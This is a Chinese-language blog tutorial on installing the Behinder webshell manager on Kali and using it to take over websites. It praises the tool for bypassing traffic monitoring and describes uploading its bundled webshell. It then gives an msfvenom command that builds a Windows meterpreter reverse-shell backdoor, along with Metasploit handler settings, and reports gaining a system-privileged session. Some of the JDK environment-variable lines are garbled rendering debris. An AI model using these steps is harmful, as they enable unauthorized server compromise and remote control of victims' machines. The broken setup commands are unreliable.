冰蝎的安装与使用（一款强大的webshell管理工具）

冰蝎

文章目录

前言

目前最流行的webshell管理工具有中国菜刀，蚁剑，哥斯拉以及今天介绍的冰蝎，冰蝎采用了强大AES密钥加密，最新版的4.0甚至不用设置密码，用冰蝎自带的马上传即可获得webshell，取消了老版本的三次握手的协议，绕过了很多的流量监测设备。今天给大家讲解一下，他在kali中的安装与使用。

kali安装jdk8

冰蝎的安装需要配置jdk6~jdk8的环境

1、下载相应jdk

注意：查看kali系统位数！！！

Oracle官网历史版本：https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

2、解压jdk文件移动到/root/目录下

tar -zxf jdk-8u202-linux-i586.tar.gz
mv jdk1.8.0_202/ /root/

3、配置环境变量

export JAVA_HOME=/root/jdk1.8.0_321
export CLASSPATH=.:

    J
   
   
    A
   
   
    V
   
   
    
     A
    
    
     H
    
   
   
    O
   
   
    M
   
   
    E
   
   
    /
   
   
    l
   
   
    i
   
   
    b
   
   
    /
   
   
    d
   
   
    t
   
   
    .
   
   
    j
   
   
    a
   
   
    r
   
   
    :
   
  
  
   JAVA_HOME/lib/dt.jar:
  
 
JAVAH​OME/lib/dt.jar:JAVA_HOME/lib/tools.jar

export PATH=

    P
   
   
    A
   
   
    T
   
   
    H
   
   
    :
   
  
  
   PATH:
  
 
PATH:JAVA_HOME/bin

4、给jdk1.8设置序列号

update-alternatives --install /usr/bin/java java /root/jdk1.8.0_321/bin/java 3

5、设置所需jdk版本

我这里刚开始使用的是java11，输入命令最后选择你需要的java，输入序列号，回车
update-alternatives --config java

这就完成了

因为我的kali本身安装的是11版本的，由于版本太高，javafx不能启动，我们我们需要下载jdk8版本的，用来启动冰蝎，所以可以通过修改默认jre来运行冰蝎，如果没有预装可以到Oracle官网下载并安装

这里输入输入你的编号就ok
完成后，可以在终端输入java -version 来确认当前默认jre版本

启动冰蝎

在冰蝎目录下输入java -jar Behinder.jar
我们将冰蝎自带的马上传，就连接成功了



主机存活探测

我们也可以反弹shell，首先打开msf生成window后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.129 lport=4446 -f exe -o shell.exe

我们在kali的桌面就会生成一个shell.exe程序，我们只要上传到webshell的网站根目录下，在终端打开运行就行了

在msf中设置参数
use exploit/multi/handler
set windows/meterpreter/reverse_tcp
set lhost 192.168.231.129
set lport 4446

运行之后，我们看到返回了会话，且是一个system权限

实验到这里就结束了，当然还要数据库连接的功能，这里就不介绍了，大家好好下载使用一下吧

后记

冰蝎的安装与使用就讲解到这里了，后续要是还有什么好用的工具，再给大家介绍了哈。